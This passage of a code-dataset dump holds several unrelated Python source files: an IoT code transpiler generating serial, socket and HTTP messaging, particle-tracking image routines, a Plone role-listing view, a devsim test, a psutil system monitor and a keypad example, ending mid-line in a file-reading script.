CommLib.recieveBySocketAtRaspberry(node)\n \n for stmt in newArgs:\n returnNewArgs.append(stmt)\n# else:\n# print (\"Invalid location\")\n# return [node]\n \n return newArgs\n \n #아두이노에서 라즈베리 파이로 보내는 시리얼 통신\n def sendBySerialAtArduino(node, methval): \n # jsonObject = jsonBuffer.createObject()\n # jsonObject[\"args1\"] = args1\n # jsonObject[\"args2\"] = args2\n # ...\n # jsonObject[\"argsn\"] = argsn\n # jsonObject.printTo(Serial)\n \n smethval = CommLib.unparseExpr(methval)\n newAsts = []\n \n newAsts.append(ast.parse('sendFunid: JsonObject = jsonBuffer.createObject()'))\n newAsts.append(ast.parse('sendFunid[\"_funid\"] = ' + smethval))\n newAsts.append(ast.parse('sendFunid.printTo(Serial)'))\n \n newAsts.append(ast.parse('jsonObject: JsonObject = jsonBuffer.createObject()'))\n num = 0\n \n for arg in node.value.args:\n sarg = CommLib.unparseExpr(arg)\n newAsts.append(ast.parse('jsonObject[\"args' + str(num) + '\"] = ' + sarg))\n num = num + 1\n \n newAsts.append(ast.parse('jsonObject.printTo(Serial)'))\n newAsts.append(ast.parse('jsonBuffer.clear()'))\n\n return newAsts\n\n # 아두이노에서 라즈베리 파이에서 받은 값을 읽는 시리얼 통신\n def recieveBySerialAtArduino(node):\n # servoControl(self, methval, data1, data2, ..., datan)\n \n # String recieveData = \"\"\n # while Serial.available() > 0:\n # recieveData = Serial.readString()\n \n # JsonObject& jsonObject = jsonBuffer.createObject(recieveData)\n \n # 
data1 = jsonObject[\"args1\"]\n # data2 = jsonObject[\"args2\"]\n # ...\n # datan = jsonObject[\"argsn\"]\n \n newAsts = []\n \n newAsts.append(ast.parse('recieveData: String = Serial.readStringUntil(char(\"\\\\n\"))'))\n \n ifSource = \"if recieveData != '':\\n\" + \"\\trecieveJson: JsonObject = jsonBuffer.parseObject(recieveData)\\n\"\n \n num = 0\n for arg in node.args.args:\n sarg = CommLib.unparseExpr(arg)\n argAst = ast.parse(sarg)\n newAsts.append(ast.parse(sarg))\n ifSource += \"\\ttmp\" + str(num) + \": \" + argAst.body[0].annotation.id + \" = recieveJson['args\" + str(num) + \"']\\n\"\n ifSource += \"\\t\" + argAst.body[0].target.id + \" = tmp\" + str(num) + \"\\n\"\n num = num + 1\n\n newAsts.append(ast.parse(ifSource))\n newAsts.append(ast.parse('jsonBuffer.clear()'))\n\n return newAsts\n \n #라즈베리파이에서 아두이노의 값을 읽어오는 시리얼 통신\n def recieveBySerialAtRaspberry(node): \n # requesttest(self, val1, val2, ..., valn)\n #\n #import serial\n #import requests\n #ser=serial.Serial('/dev/ttyACM0', 9600) -> option으로 device, baud rate\n #{\"Serial\":[dev:'/dev/ttyACM0', baudrate:9600]}\n \n #val1 = ser.read(1)\n #val2 = ser.read(1)\n #...\n #valn = ser.read(1)\n\n newAsts = []\n \n if 'serial' not in replaceAST.importList:\n replaceAST.importList.append('serial')\n \n if 'json' not in replaceAST.importList:\n replaceAST.importList.append('json')\n \n newAsts.append(ast.parse('_recieveData = _ser.readline().strip().decode(\"utf-8\")'))\n newAsts.append(ast.parse('global _recieveJsonData'))\n \n ifSource = 'if _recieveData != \"\":\\n' + '\\t_recieveJsonData = json.loads(_recieveData)\\n'\n ifSource += 'else:\\n' + '\\t_recieveJsonData = \"\"\\n'\n newAsts.append(ast.parse(ifSource))\n \n num = 0\n ifSource = 'if _recieveJsonData != \"\":\\n'\n for arg in node.args.args:\n sarg = CommLib.unparseExpr(arg)\n ifSource += '\\t' + sarg + ' = _recieveJsonData[\"args' + str(num) + '\"]\\n'\n num = num + 1\n \n newAsts.append(ast.parse(ifSource))\n \n return newAsts\n \n def sendBySerialAtRaspberry(node, methval):\n #sendtest(self, methval, val1, val2, ..., valn):\n #ser=serial.Serial('/dev/ttyACM0', 9600); -> option으로 device, baud rate\n #{\"Serial\":[dev:'/dev/ttyACM0', baudrate:9600]}\n\n #ser.write(metval)\n #ser.write(val1)\n #ser.write(val2)\n # ...\n #ser.write(valn)\n newAsts = []\n \n if 'serial' not in replaceAST.importList:\n replaceAST.importList.append('serial')\n if 'json' not in replaceAST.importList:\n replaceAST.importList.append('json')\n \n newAsts.append(ast.parse('global ser'))\n newAsts.append(ast.parse('ser = serial.Serial(\"/dev/ttyACM0\", 9600)'))\n\n smethval = CommLib.unparseExpr(methval)\n \n newAsts.append(ast.parse('_sendData = {}'))\n newAsts.append(ast.parse('_sendData[\"_funid\"] = ' + smethval))\n newAsts.append(ast.parse('_sendFunid = json.dumps(_sendData)'))\n newAsts.append(ast.parse('ser.write(_sendFunid.encode(\"utf-8\"))'))\n newAsts.append(ast.parse('ser.write(\"\\\\n\".encode(\"utf-8\"))'))\n newAsts.append(ast.parse('_sendData.clear()'))\n\n num = 0\n \n for arg in node.value.args:\n sarg = CommLib.unparseExpr(arg)\n newAsts.append(ast.parse('_sendData[\"args' + str(num) + '\"] = ' + sarg))\n num = num + 1\n \n newAsts.append(ast.parse('_jsonData = json.dumps(_sendData)'))\n newAsts.append(ast.parse('ser.write(_jsonData.encode(\"utf-8\"))'))\n newAsts.append(ast.parse('ser.write(\"\\\\n\".encode(\"utf-8\"))'))\n newAsts.append(ast.parse('ser.close()'))\n \n return newAsts\n \n def sendBySocketAtRaspberry(node, methval): \n \n newAsts = []\n \n if 'socket' not in 
replaceAST.importList:\n replaceAST.importList.append('socket')\n if 'json' not in replaceAST.importList:\n replaceAST.importList.append('json')\n \n smethval = CommLib.unparseExpr(methval)\n \n newAsts.append(ast.parse('_sendData = {}'))\n newAsts.append(ast.parse('_sendData[\"_funid\"] = ' + smethval))\n newAsts.append(ast.parse('_sendFunid = json.dumps(_sendData)'))\n newAsts.append(ast.parse('conn.sendall(_sendFunid.encode(\"utf-8\"))'))\n newAsts.append(ast.parse('_sendData.clear()'))\n \n num = 0\n \n for arg in node.value.args:\n sarg = CommLib.unparseExpr(arg)\n newAsts.append(ast.parse('_sendData[\"args' + str(num) + '\"] = ' + sarg))\n num = num + 1\n \n newAsts.append(ast.parse('_jsonData = json.dumps(_sendData)'))\n newAsts.append(ast.parse('conn.sendall(_sendData.encode(\"utf-8\"))'))\n newAsts.append(ast.parse('conn.close()'))\n \n return newAsts\n \n def recieveBySocketAtRaspberry(node):\n # sendtest(data)\n \n # _jsonData = json.loads(_recieveData)\n \n # args1 = _recieveData[\"args1\"]\n # args2 = _recieveData[\"args2\"]\n # ...\n # argsn = _recieveData[\"argsn\"]\n \n newAsts = []\n \n if 'socket' not in replaceAST.importList:\n replaceAST.importList.append('socket')\n if 'json' not in replaceAST.importList:\n replaceAST.importList.append('json')\n \n \n newAsts.append(ast.parse('_recieveData = \"\"'))\n newAsts.append(ast.parse('_cnt = 0'))\n \n source = \"while True:\\n\"\n source += \"\\ttmp = _conn.recv(1).decode('utf-8')\\n\" + \"\\t_recieveData += tmp\\n\"\n source += \"\\tif tmp == '{':\\n\" + \"\\t\\t_cnt = _cnt + 1\\n\" + \"\\telif tmp == '}':\\n\" + \"\\t\\t_cnt = _cnt - 1\\n\"\n source += \"\\tif _cnt == 0:\\n\" + \"\\t\\tbreak\\n\"\n newAsts.append(ast.parse(source))\n newAsts.append(ast.parse('global _jsonData'))\n \n ifSource = 'if _recieveData != \"\":\\n' + '\\t_jsonData = json.loads(_recieveData)\\n'\n ifSource += 'else:\\n' + '\\t_jsonData = \"\"\\n'\n newAsts.append(ast.parse(ifSource))\n \n num = 0\n \n ifSource = 'if _jsonData != \"\":\\n'\n for arg in node.args.args:\n sarg = CommLib.unparseExpr(arg)\n ifSource += '\\t' + sarg + ' = _jsonData[\"args' + str(num) + '\"]\\n'\n num = num + 1\n \n newAsts.append(ast.parse(ifSource))\n \n return newAsts\n \n def sendBySocketAtMobile(node, methval):\n \n newAsts = []\n \n if 'socket' not in replaceAST.importList:\n replaceAST.importList.append('socket')\n if 'json' not in replaceAST.importList:\n replaceAST.importList.append('json')\n \n newAsts.append(ast.parse('_writer = socket.socket(socket.AF_INET, socket.SOCK_STREAM)'))\n\n smethval = CommLib.unparseExpr(methval)\n newAsts.append(ast.parse('_sendData = {}'))\n \n sparm = CommLib.unparseExpr(node.value.args[0])\n newAsts.append(ast.parse('_writer_tup = ' + sparm))\n newAsts.append(ast.parse('_writer.connect(_writer_tup)'))\n newAsts.append(ast.parse('_sendData[\"_funid\"] = ' + smethval))\n newAsts.append(ast.parse('_sendFunid = json.dumps(_sendData)'))\n newAsts.append(ast.parse('_writer.sendall(_sendFunid.encode(\"utf-8\"))'))\n newAsts.append(ast.parse('_sendData.clear()'))\n\n num = 0\n \n for arg in node.value.args[1:]:\n sarg = CommLib.unparseExpr(arg)\n newAsts.append(ast.parse('_sendData[\"args' + str(num) + '\"] = ' + sarg))\n num = num + 1\n \n newAsts.append(ast.parse('_jsonData = json.dumps(_sendData)'))\n newAsts.append(ast.parse('_writer.sendall(_jsonData.encode(\"utf-8\"))'))\n \n return newAsts\n \n def sendByHttpAtMobile(node, methval, targets):\n # getDoorlist()\n \n #door_arr = MyCloud.doorlist()\n #while((line = buffer.readLine()) != 
null)\n        \n        newAsts = []\n        num = 0\n        ipAddress = \"\"\n        \n        smethval = CommLib.unparseExpr(methval)\n        newAsts.append(ast.parse(\"_field_dict = {}\"))\n        newAsts.append(ast.parse('_field_dict[\"_funid\"] = ' + smethval))\n        \n        if 'urllib3' not in replaceAST.importList:\n            replaceAST.importList.append('urllib3')\n        if 'json' not in replaceAST.importList:\n            replaceAST.importList.append('json')\n        \n        for arg in node.value.args:\n            sarg = CommLib.unparseExpr(arg)\n            if arg == node.value.args[0]:\n                ipAddress = sarg\n            else:\n                newAsts.append(ast.parse('_field_dict[\"args' + str(num) + '\"] = ' + sarg))\n                num += 1\n        \n        newAsts.append(ast.parse(\"req = urllib3.PoolManager()\"))\n        \n        for target in targets:\n            starget = CommLib.unparseExpr(target)\n            targetAst = ast.parse('_' + starget + ' = req.request(\"POST\", ' + ipAddress + ', fields = _field_dict).data.decode(\"utf-8\")')\n            newAsts.append(targetAst)\n            jsonAst = ast.parse(starget + ' = json.loads(_' + starget + ')')\n            newAsts.append(jsonAst)\n        \n        return newAsts\n    \n    def sendByHttpAtRaspberry(node, methval, targets):\n        \n        newAsts = []\n        num = 0\n        ipAddress = \"\"\n        \n        smethval = CommLib.unparseExpr(methval)\n        newAsts.append(ast.parse(\"_field_dict = {}\"))\n        newAsts.append(ast.parse(\"_field_dict['_funid'] = \" + smethval))\n        \n        if 'urllib3' not in replaceAST.importList:\n            replaceAST.importList.append('urllib3')\n        \n        for arg in node.value.args:\n            sarg = CommLib.unparseExpr(arg)\n            if arg == node.value.args[0]:\n                ipAddress = sarg\n            else:\n                newAsts.append(ast.parse(\"_field_dict['args\" + str(num) +\"'] = \" + sarg))\n                num += 1\n        \n        newAsts.append(ast.parse(\"req = urllib3.PoolManager()\"))\n        \n        if targets != []: \n            for target in targets:\n                starget = CommLib.unparseExpr(target)\n                newAsts.append(ast.parse(starget + ' = req.request(\"POST\", ' + ipAddress + ', fields = _field_dict)'))\n        else:\n            newAsts.append(ast.parse(\"req.request('POST', \" + ipAddress + \", fields = _field_dict)\"))\n        \n        return newAsts\n    \n    def recieveByHttpAtMobile(node):\n        return []\n    \n    def sendByHttpAtCloud(node, methval):\n        return []\n    \n    def recieveByHttpAtCloud(node):\n        newAsts = []\n        num = 2\n        \n        if 'sys' not in replaceAST.importList:\n            replaceAST.importList.append('sys')\n        \n        if node.args.args != []:\n            for arg in node.args.args:\n                sarg = CommLib.unparseExpr(arg)\n                newAsts.append(ast.parse(sarg + ' = sys.argv[' + str(num) + ']'))\n                num = num + 1\n        \n        return newAsts\n\n    def unparseStmt(tree):\n        sio = io.StringIO()\n        astunparse.Unparser(tree, sio)\n        \n        s = sio.getvalue().split(\"\\n\")[1]\n        \n        return s\n    \n    def unparseExpr(tree):\n        if type(tree).__name__ == 'Str':\n            return tree.s\n        else:\n            sio = io.StringIO()\n            astunparse.Unparser(tree, sio)\n            \n            s = sio.getvalue().split(\"\\n\")[0]\n            \n            return s\n    \nclass TableGenVisitor(ast.NodeVisitor): \n    def __init__(self):\n        self.isDef = False\n        self.className = \"\"\n        self.num = 0\n        global classArr\n        global methodArr\n        global allLocProcList\n        classArr = {}\n        methodArr = {}\n        allLocProcList = []\n    \n    \n    def generic_visit(self, node):\n        if type(node).__name__ == 'ClassDef':\n            self.isDef = True\n            self.className = node.name\n\n            # the communication method is chosen based on which base class is inherited\n            if node.bases[0].id == 'Arduino' or node.bases[0].id == 'Raspberry' or node.bases[0].id == 'Cloud' or node.bases[0].id == 'Mobile':\n                classArr[self.className] = node.bases[0].id\n\n        # build the method list per class\n        if type(node).__name__ == 'FunctionDef':\n            name = node.name\n            methodArr[node.name] = self.className\n            allLocProcList.append((self.className, node.name, self.num))\n            self.num = self.num + 1\n            
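        # Continue the default traversal below so that definitions nested deeper in the tree are indexed as well.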
\n        ast.NodeVisitor.generic_visit(self, node)\n    \nclass FindCalleeCaller(ast.NodeVisitor):\n    def __init__(self):\n        self.className = \"\"\n        global calleeArr\n        calleeArr = []\n        global localFunc\n        localFunc = []\n    \n    def visit_Module(self, node):\n        self.generic_visit(node)\n        global localFunc\n        \n        tmp = []\n        for funcName in localFunc:\n            tmp.append(funcName)\n        \n        for funcName in localFunc:\n            for locProc in allLocProcList:\n                if classArr.get(locProc[0]) == 'Arduino':\n                    if locProc[1] == funcName:\n                        break\n            else:\n                del tmp[tmp.index(funcName)]\n        \n        localFunc.clear()\n        localFunc = tmp\n    \n    def visit_ClassDef(self, node):\n        self.className = node.name\n        \n        self.generic_visit(node)\n    \n    def visit_Call(self, node):\n        if type(node.func).__name__ == 'Attribute':\n            callee = methodArr.get(node.func.attr)\n            \n            if callee is not None and not(calleeArr.__contains__((node.func.attr, callee, self.className))):\n                calleeArr.append((node.func.attr, callee, self.className)) \n        elif type(node.func).__name__ == 'Name':\n            if classArr.get(self.className) == 'Arduino':\n                localFunc.append(node.func.id)\n\nprint (\"1: door state, 2: control, 3: DB content, 4: total case, 5: custom case\")\nselection = input(\"Enter the number : \")\n\nfirstCase = \"case1_input/unipyprogram_doorstate.txt\"\nfirstOutput = \"case1_input/output\"\nsecondCase = \"case2_input/unipyprogram_control.txt\"\nsecondOutput = \"case2_input/output\"\nthirdCase = \"case3_input/unipyprogram_dbcontent.txt\"\nthirdOutput = \"case3_input/output\"\nfourthCase = \"unipy/unipy_input.txt\"\nfourthOutput = \"unipy/output\"\n\nfullPath = \"\"\nfileName = \"\"\ndirectory = \"\"\nfilename = \"\"\n\nif selection == '1':\n    fullPath = firstCase\n    fileName = firstOutput\nelif selection == '2':\n    fullPath = secondCase\n    fileName = secondOutput\nelif selection == '3':\n    fullPath = thirdCase\n    fileName = thirdOutput\nelif selection == '4':\n    fullPath = fourthCase\n    fileName = fourthOutput\nelif selection == '5':\n    directory = input(\"Enter the working directory : \")\n    filename = input(\"Enter the filename : \")\n    fullPath = directory + \"/\" + filename\n    fileName = directory + \"/output\"\nelse:\n    sys.exit(1)\n\n# read the Python source file and convert it to a string\nf = open(fullPath, 'r+')\ncontent = f.read()\n\n# parse the string -> record visits\nx = TableGenVisitor()\nt = ast.parse(content)\n\nx.visit(t)\n\nf = FindCalleeCaller()\nf.visit(t)\n\nreplace_ast = replaceAST()\nnewT = replace_ast.visit(t)\n\n#codegen(newT)\n\nfileGen = distFile(fileName)\nfileGen.visit(newT)\n","sub_path":"UnipyProgram.py","file_name":"UnipyProgram.py","file_ext":"py","file_size_in_byte":41307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"460568662","text":"import cv2\nimport numpy as np\nimport trackpy as tp\nfrom ParticleTrackingGui.general.parameters import get_param_val, get_method_key\nimport pandas as pd\nimport ParticleTrackingGui.tracking.intensity_methods as im\n\n\n'''\n--------------------------------------------------------------------------------------------\n--------------------------------------------------------------------------------------------\nTracking Methods\n--------------------------------------------------------------------------------------------\n--------------------------------------------------------------------------------------------\n\n'''\n\ndef trackpy(frame,_, parameters=None, call_num=None):\n    method_key = get_method_key('trackpy', call_num)\n    df = tp.locate(frame, get_param_val(parameters[method_key]['size_estimate']), 
invert=get_param_val(parameters[method_key]['invert']))\n\n if parameters[method_key]['get_intensities']:\n x = df['x'].to_numpy()\n y = df['y'].to_numpy()\n intensity = []\n for i in range(np.size(x)):\n xc = x[i]\n yc = y[i]\n rc = get_param_val(parameters[method_key]['intensity_radius'])\n\n try:\n # Try because some circles overlap the edge giving meaningless answers\n cut_out_frame = frame[int(yc - rc):int(yc + rc), int(xc - rc):int(xc + rc)]\n h, w = cut_out_frame.shape[:2]\n mask = create_circular_mask(h, w)\n masked_img = cut_out_frame.copy()\n masked_img[~mask] = 0\n value = getattr(im, parameters[method_key]['get_intensities'])(masked_img)\n except:\n value = np.Nan\n\n intensity.append(value)\n df['intensities'] = np.array(intensity)\n return df\n\ndef hough(frame, _,parameters=None, call_num=None):\n '''\n Performs the opencv hough circles transform to locate\n circles in an image.\n\n :param frame:\n :param parameters:\n :param call_num:\n :return:\n '''\n method_key = get_method_key('hough', call_num)\n\n circles = np.squeeze(cv2.HoughCircles(\n frame,\n cv2.HOUGH_GRADIENT, 1,\n get_param_val(parameters[method_key]['min_dist']),\n param1=get_param_val(parameters[method_key]['p1']),\n param2=get_param_val(parameters[method_key]['p2']),\n minRadius=get_param_val(parameters[method_key]['min_rad']),\n maxRadius=get_param_val(parameters[method_key]['max_rad'])))\n\n try:\n circles_dict = {'x': circles[:, 0], 'y': circles[:, 1], 'r': circles[:, 2]}\n except:\n circles_dict={'x':[1],'y':[1],'r':[5]}\n\n\n if parameters[method_key]['get_intensities']:\n intensity = []\n for i,_ in enumerate(circles_dict['x']):\n xc = circles_dict['x'][i]\n yc = circles_dict['y'][i]\n rc = circles_dict['r'][i]\n\n try:\n #Try because some circles overlap the edge giving meaningless answers\n cut_out_frame = frame[int(yc - rc):int(yc + rc), int(xc - rc):int(xc + rc)]\n h,w= cut_out_frame.shape[:2]\n mask = create_circular_mask(h, w)\n masked_img = cut_out_frame.copy()\n masked_img[~mask] = 0\n value = getattr(im, parameters[method_key]['get_intensities'])(masked_img)\n except:\n value = np.Nan\n\n intensity.append(value)\n\n circles_dict['intensities']=np.array(intensity)\n\n df = pd.DataFrame(circles_dict)\n\n return df\n\n\n\ndef boxes(frame, _,parameters=None, call_num=None):\n '''\n boxes method finds contour of object but reduces the info to\n a rotated bounding box. 
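    The result comes back as a DataFrame with columns x, y, theta, width, length, contours and box (plus intensities when requested).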
Use for finding an angle of object or\n estimate of size.\n '''\n method_key = get_method_key('boxes',call_num=call_num)\n params = parameters[method_key]\n get_intensities = params['get_intensities']\n\n area_min = get_param_val(params['area_min'])\n area_max = get_param_val(params['area_max'])\n info = []\n contour_pts = _find_contours(frame)\n\n for index, contour in enumerate(contour_pts):\n area = int(cv2.contourArea(contour))\n if (area < area_max) and (area >= area_min):\n info_contour = _rotated_bounding_rectangle(contour)\n cx, cy = np.mean(info_contour[5], axis=0)\n angle = info_contour[2]\n width = info_contour[3]\n length = info_contour[4]\n box = info_contour[5]\n\n if get_intensities:\n intensity = _find_intensity_inside_contour(contour, frame, parameters['get_intensities'])\n info_contour = [cx, cy, angle, width, length, contour, box, intensity]\n else:\n info_contour = [cx, cy, angle, width, length, contour, box]\n info.append(info_contour)\n\n if get_intensities:\n info_headings = ['x', 'y', 'theta', 'width', 'length', 'contours','box', 'intensities']\n else:\n info_headings = ['x', 'y', 'theta', 'width', 'length', 'contours','box']\n df = pd.DataFrame(data=info, columns=info_headings)\n return df\n\ndef contours(pp_frame, frame, parameters=None, call_num=None):\n '''\n boxes method finds contour of object but reduces the info to\n a rotated bounding box. Use for finding an angle of object or\n estimate of size. If you need to do something with the pixels\n use contours instead.\n\n contours stores: the centroid cx, cy, area enclosed by contour,\n the bounding rectangle which is used with contour to generate\n mask so that you can extract pixels from original image\n and perform some analysis.\n '''\n sz = np.shape(frame)\n if np.shape(sz)[0] == 3:\n frame= cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n method_key = get_method_key('contours',call_num=call_num)\n params = parameters[method_key]\n get_intensities = params['get_intensities']\n\n area_min = get_param_val(params['area_min'])\n area_max = get_param_val(params['area_max'])\n info = []\n\n contour_pts = _find_contours(pp_frame)\n\n for index, contour in enumerate(contour_pts):\n M = cv2.moments(contour)\n if M['m00'] > 0:\n area = cv2.contourArea(contour)\n if (area < area_max) & (area > area_min):\n cx = int(M['m10'] / M['m00'])\n cy = int(M['m01'] / M['m00'])\n\n box = cv2.boundingRect(contour)\n if get_intensities:\n intensity = _find_intensity_inside_contour(contour, frame, params['get_intensities'])\n info_contour = [cx, cy, area, contour, box, intensity]\n else:\n info_contour = [cx, cy, area, contour, box]\n info.append(info_contour)\n\n if get_intensities:\n info_headings = ['x', 'y', 'area', 'contours', 'boxes', 'intensities']\n else:\n info_headings = ['x', 'y', 'area', 'contours', 'boxes']\n df = pd.DataFrame(data=info, columns=info_headings)\n\n return df\n\n\n'''\n------------------------------------------------------------------------\nSupporting functions\n------------------------------------------------------------------------\n'''\ndef create_circular_mask(h, w, center=None, radius=None):\n\n if center is None: # use the middle of the image\n center = (int(w/2), int(h/2))\n if radius is None: # use the smallest distance between the center and image walls\n radius = min(center[0], center[1], w-center[0], h-center[1])\n\n Y, X = np.ogrid[:h, :w]\n dist_from_center = np.sqrt((X - center[0])**2 + (Y-center[1])**2)\n\n mask = dist_from_center <= radius\n return mask\n\ndef _find_contours(img, 
hierarchy=False):\n \"\"\"\n contours is a tuple containing (img, contours)\n \"\"\"\n # work for any version of opencv\n try:\n im, contours, hier = cv2.findContours(\n img, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n except:\n contours, hier = cv2.findContours(\n img, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n if hierarchy:\n return contours, hier\n else:\n return contours\n\n\n\ndef _rotated_bounding_rectangle(contour):\n rect = cv2.minAreaRect(contour)\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n dim = np.sort(rect[1])\n\n #[centrex, centrey, angle, length, width, box_corners]\n info = [rect[0][0], rect[0][1], rect[2], dim[0], dim[1], box]\n return info\n\ndef _draw_contours(img, contours, col=(0,0,255), thickness=1):\n \"\"\"\n\n :param img:\n :param contours:\n :param col: Can be a defined colour in colors.py or a list of tuples(3,1) of colors of length contours\n :param thickness: -1 fills the contour.\n :return:\n \"\"\"\n if thickness == -1:\n thickness = cv2.FILLED\n\n if (np.size(np.shape(col)) == 0) | (np.size(np.shape(col)) == 1):\n img = cv2.drawContours(img, [contours], -1, col, thickness)\n else:\n for i, contour in enumerate(contours):\n img = cv2.drawContours(img, contour, -1, col[i], thickness)\n return img\n\ndef _find_intensity_inside_contour(contour, frame, intensity_method):\n #find bounding rectangle\n x,y,w,h = cv2.boundingRect(contour)\n cut_out_frame = frame[y:y+h,x:x+w]\n shifted_contour = contour - [x,y]\n mask = np.zeros((h,w,3))\n mask = _draw_contours(mask, shifted_contour,col=(255,255,255),thickness=-1)\n cut_out_frame[~(mask[:,:,0] > 0)] = 0\n value = getattr(im, intensity_method)(cut_out_frame)\n return value\n\n\n\n\n\n","sub_path":"tracking/tracking_methods.py","file_name":"tracking_methods.py","file_ext":"py","file_size_in_byte":9425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"588501509","text":"from plone import api\nfrom Products.CMFPlone.interfaces import IPloneSiteRoot\nfrom Products.Five.browser import BrowserView\nfrom zope.component.hooks import getSite\n\n\ndef get_principals_from_local_roles(obj):\n local_roles = obj.get_local_roles()\n principals = [assignment[0] for assignment in local_roles]\n return principals\n\n\ndef get_principals_from_role_manager():\n site = getSite()\n role_manager = site.acl_users.portal_role_manager\n principal_roles = list(role_manager._principal_roles.items())\n principals = [assignment[0] for assignment in principal_roles]\n return principals\n\n\ndef get_all_role_principals(context):\n path = '/'.join(context.getPhysicalPath())\n catalog = api.portal.get_tool('portal_catalog')\n brains = catalog.unrestrictedSearchResults(path=path)\n\n all_principals = set()\n for brain in brains:\n obj = brain.getObject()\n principals = get_principals_from_local_roles(obj)\n all_principals.update(principals)\n\n if IPloneSiteRoot.providedBy(context):\n # Invoked on Plone site - include local roles of Plone site in\n # search since the Plone site isn't catalogued\n site = context\n principals = get_principals_from_local_roles(site)\n all_principals.update(principals)\n\n # Include principals from portal_role_manager\n principals = get_principals_from_role_manager()\n all_principals.update(principals)\n return all_principals\n\n\nclass ListRolePrincipalsView(BrowserView):\n \"\"\"Lists all the unique principals that are used in role assignments\n (below the adapted context).\n\n Also includes the Plone site (if called on site root) and any principals\n from global role 
assignments in portal_role_manager.\n \"\"\"\n\n def __call__(self):\n all_principals = get_all_role_principals(self.context)\n result = '\\n'.join(sorted(p for p in all_principals))\n return result\n","sub_path":"opengever/maintenance/browser/list_role_principals.py","file_name":"list_role_principals.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"174919270","text":"# Copyright 2013 Devsim LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport devsim\nimport test_common\n\ndevice=\"MyDevice\"\nregion=\"MyRegion\"\n\ntest_common.CreateSimpleMesh(device, region)\n\nfor name, equation in (\n (\"test1\", \"log(-1)\"),\n (\"test2\", \"log(x)\"),\n):\n devsim.node_model(device=device, region=region, name=name, equation=equation)\n try:\n print(devsim.get_node_model_values(device=device, region=region, name=name))\n except devsim.error as x:\n print(x)\n\n","sub_path":"testing/fpetest1.py","file_name":"fpetest1.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"645647016","text":"from configparser import ConfigParser\nimport datetime\nimport json\nfrom prettytable import PrettyTable\nimport psutil\nfrom time import sleep\n\n\ndef cat():\n print(str(\"(=^・ェ・^=)\"))\n return print()\n\n\ndef pretty():\n myt = PrettyTable()\n myt.field_names = [\n \"CPU,%\", \"Memory(rss)\", \"Used VMemory\",\n \"IO (write)\", \"Network(sent)\"\n ]\n myt.add_row([cpu, memory, vmemory, io, network])\n return myt.get_string()\n\n\ndef write_text(z):\n out_file = open(\"output.txt\", \"a\")\n out_file.write(\"SNAPSHOT \" + str(count) + \" : \" + '\\n')\n out_file.write(\"Date: \" + date + '\\t' + time + '\\n')\n out_file.write(z + '\\n')\n out_file.write('\\n' + '\\n')\n out_file.close()\n\n\ndef write_json(y):\n out_file = open(\"output_json\", \"a\")\n out_file.write(\"SNAPSHOT \" + str(count) + \" : \" + '\\n')\n out_file.write(\"Date: \" + date + '\\t' + time + '\\n')\n out_file.write(json.dumps(y + '\\n'))\n out_file.write('\\n' + '\\n')\n out_file.close()\n\n\ncat()\ncount = 1\n\nparser = ConfigParser()\nparser.read('input.txt')\ninterval = int(parser.get('common', 'interval'))\noutput = (parser.get('common', 'output'))\n\nprint(\"Interval = \", interval)\nprint(\"Output type = \", output)\n\nif output == \"text\":\n while True:\n cpu = str(psutil.cpu_percent())\n memory = str(psutil.Process().memory_info().rss / (1024 * 1024))\n vmemory = str(psutil.virtual_memory().used / (1024 * 1024))\n io = str(psutil.disk_io_counters().write_bytes / (1024 * 1024))\n network = str(psutil.net_io_counters().bytes_sent / (1024 * 1024))\n time = str(datetime.datetime.now().time())\n date = str(datetime.datetime.now().date())\n write_text(pretty())\n count += 1\n sleep(interval)\n\n\nif output == \"json\":\n while True:\n cpu = str(psutil.cpu_percent())\n memory = str(psutil.Process().memory_info().rss / (1024 * 1024))\n 
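# psutil reports raw byte counts; dividing by 1024*1024 converts them to MiB\n        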
vmemory = str(psutil.virtual_memory().used / (1024 * 1024))\n io = str(psutil.disk_io_counters().write_bytes / (1024 * 1024))\n network = str(psutil.net_io_counters().bytes_sent / (1024 * 1024))\n time = str(datetime.datetime.now().time())\n date = str(datetime.datetime.now().date())\n write_json(pretty())\n count += 1\n sleep(interval)\n","sub_path":"homework3/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"379765888","text":"# SPDX-FileCopyrightText: 2022 Dan Halbert for Adafruit Industries\n#\n# SPDX-License-Identifier: MIT\n\nimport keypad\nimport board\n\nkm = keypad.KeyMatrix(\n row_pins=(board.D0, board.D1, board.D2, board.D3),\n column_pins=(board.D4, board.D5, board.D6),\n columns_to_anodes=True,\n)\n\nwhile True:\n event = km.events.get()\n if event:\n print(event)\n","sub_path":"Keypad_Examples/keymatrix_columns_to_anodes/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"541231113","text":"import os\r\nfrom operator import itemgetter\r\n\r\ndirName = os.path.normpath(os.path.join(os.getcwd(), 'Source'))\r\ndestinationFileName = os.path.normpath(os.path.join(os.getcwd(), 'list.txt'))\r\naData = []\r\n\r\nnames = os.listdir(dirName)\r\nfor name in names:\r\n fullname = os.path.join(dirName, name)\r\n if os.path.isfile(fullname):\r\n with open(fullname, 'r', encoding=\"utf-8\") as f:\r\n lines = f.readlines()\r\n line = lines[1]\r\n line = line.replace(''','\\'')\r\n line = 